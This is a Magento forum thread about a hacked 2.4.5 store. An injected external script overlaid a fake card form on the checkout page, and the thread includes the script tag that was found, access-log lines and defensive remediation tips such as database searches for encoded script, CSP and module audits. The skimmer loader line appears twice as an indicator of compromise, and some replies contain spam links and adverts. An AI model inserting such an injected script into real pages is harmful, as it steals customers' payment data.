Magento Forums
Help
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

Magento 2 Website Hacked

‎06-27-2025 03:58 AM
‎06-27-2025 03:58 AM

Magento 2 Website Hacked

Hi,

 

Magento website was hacked recently

 

Magento version: 2.4.5

 

CC Avenue seamless module was installed at the checkout

 

The hacker has added a new custom form on the top of it and some of the customers faced the loss due to it as well

 

At checkout page, below script was loading

<script src="https://rdwebpolicyupdate.com/forms/payment-form.js"></script>

We talked with the hosting provider and they shared like

This is not malware but a DDoS attack

I found below in apache access log:

202.76.162.160 - - [24/Jun/2025:18:51:42 +0000] "GET /stores/store/redirect/store/default/from_store/ar/uenc/aHR0cHM6Ly9hbXJpLmFlL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9jb2xvcj04NiZxPXBsZWF0ZWQrZW1iZWxsaXNoZWQrc2xlZXZlZCtiZWx0K2RyZXNzJl9fX3N0b3JlPWRlZmF1bHQ%2C/ HTTP/1.1" 302 1115 "-" "Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0"
202.76.165.32 - - [24/Jun/2025:18:51:43 +0000] "GET /stores/store/switch/?from_store=ar&store=default&data=aNhfQdHlcWVhQMrZwX7WkHa3sUAimqNp&signature=649fa675e4debb2d9e7c6f6bd6abdda35462ed878715a58c05ee86577b65f303&time_stamp=1750791102&uenc=aHR0cHM6Ly9hbXJpLmFlL2NhdGFsb2dzZWFyY2gvcmVzdWx0L2luZGV4Lz9jb2xvcj04NiZxPXBsZWF0ZWQrZW1iZWxsaXNoZWQrc2xlZXZlZCtiZWx0K2RyZXNzJl9fX3N0b3JlPWRlZmF1bHQ%2C HTTP/1.1" 302 1217 "-" "Mozilla/5.0 (compatible; Windows; U; Windows NT 6.2; WOW64; en-US; rv:12.0) Gecko/20120403211507 Firefox/12.0"

I have reset password of all administrator accounts, blocked above IP range which belongs to Singapore, enabled Malware Protection Service from hosting team (Cloudways is the hosting provider)

 

I would like to know how it was possible for the attacker to add a custom form on top of the CC Avenue Card form and what additional steps we need to take to make sure it is not repeated again in future

 

Can you please give your view?

0 Kudos
Reply
5 REPLIES 5
‎06-27-2025 08:43 AM
‎06-27-2025 08:43 AM

Re: Magento 2 Website Hacked

Is it true?

0 Kudos
Reply
‎06-27-2025 09:11 PM
‎06-27-2025 09:11 PM

Re: Magento 2 Website Hacked

 

We recently faced a similar breach on a Magento 2.4.5 site where an attacker injected a malicious script:

 

html
<script src="https://rdwebpolicyupdate.com/forms/payment-form.js"></script>

This was loaded directly on the checkout page, hijacking the CC Avenue seamless payment form with a fake overlay. After investigation, we found:

  • The script wasn't due to a DDoS but a compromised file or admin access.

  • Logs showed suspicious redirects and user-agent spoofing.

  • IPs traced back to Singapore ranges.

We’ve since:

  • Reset all admin passwords

  • Blocked suspicious IP ranges

  • Enabled Cloudways Malware Protection

Still, the key question remains: How did the attacker modify core frontend files without triggering file integrity checks? Likely vectors include a vulnerable 3rd-party extension or leftover write permissions.

We’re now scanning for JS injection patterns on all project deployments — even outside Magento. For reference, we handled a similar content-level injection issue on a non-Magento app here:
👉 https://inatboxsapkindir.com.tr/

Would appreciate any insights from others on locking down JS-level form injections in Magento 2 environments.

0 Kudos
Reply
‎06-27-2025 09:53 PM
‎06-27-2025 09:53 PM

Re: Magento 2 Website Hacked

Yes, the same script was added in our case as well

I managed to find the location of the script

It was in CMS footer block with encoded format

I searched keyword "atob", "base64" in the database and found it

0 Kudos
Reply
‎07-07-2025 11:49 PM
‎07-07-2025 11:49 PM

Re: Magento 2 Website Hacked

The malicious script was added in the cms static block or cms pages, to find out script full text search in the DB with the <script> tag. Edit that block and remove the script.

Problem solved? Click Kudos and "Accept as Solution".
200+ Magento 2 Extensions for Enhanced Shopping Experience.
0 Kudos
Reply
‎07-24-2025 10:59 PM
‎07-24-2025 10:59 PM

Re: Magento 2 Website Hacked

That’s a tough situation — sorry you had to go through it. From what you described, it sounds like the attacker was able to inject a malicious JavaScript file into your checkout page. This usually happens through:

A compromised admin account (even briefly)

Vulnerabilities in third-party modules or themes

Weak file permissions on the server, allowing unauthorized edits

Outdated extensions that can be exploited

Resetting admin passwords and blocking suspicious IPs are great first steps. Beyond that, here are a few additional recommendations:

Audit all third-party modules and remove any that aren’t necessary

Use Magento’s built-in Content Security Policy (CSP) to block unexpected external scripts

Regularly scan your filesystem for unauthorized changes

Keep your Magento core and all extensions up to date

Consider using a Web Application Firewall (WAF) for real-time protection

Sometimes it also helps to get a professional security audit, especially after an incident like this.

On a different note, for anyone dealing with vehicle upgrades locally, car tint san jose ca services are quite popular to protect interiors and reduce sun damage — which is another kind of preventive protection, in a way!

Hope this helps, and best of luck securing your site moving forward!

 

0 Kudos
Reply